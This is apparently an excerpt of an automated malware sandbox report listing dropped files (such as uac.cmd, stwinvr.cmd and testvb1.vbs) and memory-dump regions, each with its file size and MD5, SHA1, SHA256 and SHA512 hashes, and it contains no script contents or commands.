                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  a1cd6a64e8f8ad5d4b6c07dc4113c7ec

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  60e2f48a51c061bba72a08f34be781354f87aa49

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  b994ae5cbfb5ad308656e9a8bf7a4a866fdeb9e23699f89f048d7f92e6bb8577

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  87a42901a63793653d49f1c6d410a429cabb470b4c340c4553cbd9eccacb38d8543f85455465e0a432d737e950c590175dad744094861f7c3e575446a65b41e8

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  3c042a03e9614ea74ef10c3995d2b15c

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  3d6ec779ee428119c4bb3bd02d5296b6ff8a49c3

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  472b555044510a66fb3b6bcd152ac8aa60582a7fce6d36e2e91e42bb3a938928

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  d518c9606786fd6c23be216da78fc4c0a2fe33f41a179d8a6f98cf2711f3e018719c9ea3beb62d6d109637bee0d3c0c3b4a954d1cf582ed65f13e8c0e18471f4

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\uac.cmd

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  431B

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  a096f7e33f10234fcb20d9f33e44c456

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  abff898911a9961e492dea122c956084301f7fe1

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  7288eba06f3edd64231fcb8a801107ae6848408d3f5b758b5953399c91d7244b

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  f71c7458096a84281b7e5062b71f0d1957002b375e8a259e57c16ede643fc534fe9046156071a2518221846bad53b33e0255db0ecf2ff3ef24e70bb07bfd456f

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BYECDAIDNAVNAA5GMJIE.temp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  73391a2ba48d372ebdd9d9e898dc6146

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  f5fb9612e6cddfa34204c5a5f8db2e1d3fa6f41d

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  7dcbca650188ddba7d3cd5e32a8417eeb5eb700a65834e41a5a66610a3ea334a

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  b65264040f52f21accff59b5eaaddc2bce9a51a9bd19d249f442f44e93fc9f6c66bcad4c58ee0c569df6c6754c35b7e00a7635e745a4326a5452e9883b7bac58

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KHVM3AWJL1JGLTI89LHW.temp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  474cb95bd1ba59bb0578de063e66b00a

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  2fbde75c4edc4291c6e6b39370f53d044f6b2a6b

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  a815688b362a149d9c7727dd3f75fa3b00c16401c93da4efe21fca5892380ff5

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  2a8c3b2fa36dd3f619fe2c7ca98179be6f61ce6b29d56d8ea9be81130fd7a2e089ffcd1a50bd76c98645e64591dd0c4f8b64db41c8fef49f0f3927f4de6748c9

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  d5e9a3ae8b472dbba0a438f18a675ddf

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  c2a2eecae3bfd9b10e9439ff79bea8442d55720e

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  16ca9d992eeaef91f57c9f3c532f23f87b852422c3d9477c7dc32b0de38efa95

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  53fbeb9a435460986f6869e9328e7397e4a66953490feafddefd15d520ccff44e7a1be8378fbb2bb5267825cc7cbf0981ceaf50fdc09ba80dcbda64e139f8188

                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  7KB

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  cf590dd259c08446508530d8da0b1768

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  47e3902f77cd880d44334c2948131a2545e019c8

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  2d8dbbadc29365e4f48e67cf36db1071add48dc3c82c019751a9b73050a7f8ce

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  4e38e33d0d3996838de7ee11541afb290ce44fbc42a83b8c180f4deb7c3a2728d45de861d867a67b8d4b03f7f7b028b8a2fab12c63dec699b79eb1453722c71e

                                                                                                                                                                                                                                                                                                                                • C:\Users\Public\testvb1.vbs

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  186B

                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                  de9cf902195071ffc4243727c838ba03

                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                  d09cb5a1df64460973ff95275faa9a4dd6a80c64

                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                  5878f152c4f030797757c0579ea8207e27e6c625c0aca481eabb2db5cf73f1af

                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                  524fa2a36a4925a34183e333400a19f0bc97640feaaf74ed116dd18c5a0bb5582054b3fbe8397c4734f8519fb303a408ff5d07975776d236b19865582c02f72a

                                                                                                                                                                                                                                                                                                                                • memory/1860-189-0x00000000779B0000-0x0000000077AAA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  1000KB

                                                                                                                                                                                                                                                                                                                                • memory/2396-16-0x0000000000400000-0x00000000013B9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                  15.7MB